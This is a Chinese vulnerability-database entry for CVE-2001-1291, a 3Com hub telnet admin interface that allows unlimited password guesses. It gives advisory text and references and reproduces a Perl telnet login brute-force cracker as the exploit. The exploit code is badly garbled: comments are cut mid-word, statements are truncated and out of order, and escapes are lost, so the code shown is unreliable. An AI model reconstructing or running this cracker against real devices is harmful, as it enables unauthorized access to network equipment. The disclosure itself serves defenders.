3Com硬件密码猜测

3Com硬件密码猜测

漏洞ID 1106428 漏洞类型 未知
发布时间 2001-07-12 更新时间 2005-05-02
图片[1]-3Com硬件密码猜测-安全小百科CVE编号 CVE-2001-1291
图片[2]-3Com硬件密码猜测-安全小百科CNNVD-ID CNNVD-200107-081
漏洞平台 Hardware CVSS评分 10.0
|漏洞来源
https://www.exploit-db.com/exploits/21011
http://www.cnnvd.org.cn/web/xxk/ldxqById.tag?CNNVD=CNNVD-200107-081
|漏洞详情
3Com硬件例如PS40SuperStackII中的远程登录服务器不延迟或拆开提供不正确的用户名或密码的远程攻击者,远程攻击者借助强力密码猜测更容易打入服务器。
|漏洞EXP
source: http://www.securityfocus.com/bid/3034/info

A vulnerability exists in certain models of 3Com hubs and potentially other 3Com network products.

The affected devices fail to properly restrict the allowed number of login attempts to the inbuilt telnet-based administration interface from remote users. Attackers can use brute-force cracking techniques in obtaining access to 3Com telnetd config accounts.

Exploiting this, a malicious user can interfere with the device's operation and configuration, creating denials of service and further compromising the network on which the device is installed. 

#!/usr/bin/perl -w

#######################esponsible for any damgae caused  #
# by the###########################################
rf, chr(13), chr(10);

recv(SOCK,$ol,1,0);
$passwd,0); 
   }
   recv(SOCK,$ol,1,0);
 $i++
}
$i=1;
}
print "nnIt's sad but true, you failed.n";
}


print "n3Com Hardware Telnet Login Cracker, written by Siberian - Sentry Research Labsnn";
print "Get the latest Version at www.sentry-labs.comnn [target host] [dictionary] (username)";
$us= inet_aton($remote) or die "No target host computer found!";
$paddr = sockaddr_in(23, $iesspass();

close(FILE1);
close(SOCK);
exit 0;
|参考资料

来源:XF
名称:3com-telnetd-brute-force(6855)
链接:http://xforce.iss.net/static/6855.php
来源:BID
名称:3034
链接:http://www.securityfocus.com/bid/3034
来源:BUGTRAQ
名称:200107123ComTelnetD
链接:http://www.securityfocus.com/archive/1/196957

相关推荐: Caldera OpenServer SCOAdmin Symbolic Link Vulnerability

Caldera OpenServer SCOAdmin Symbolic Link Vulnerability 漏洞ID 1102038 漏洞类型 Unknown 发布时间 2002-05-29 更新时间 2002-05-29 CVE编号 N/A CNNVD-…

© 版权声明
THE END
喜欢就支持一下吧
点赞0
分享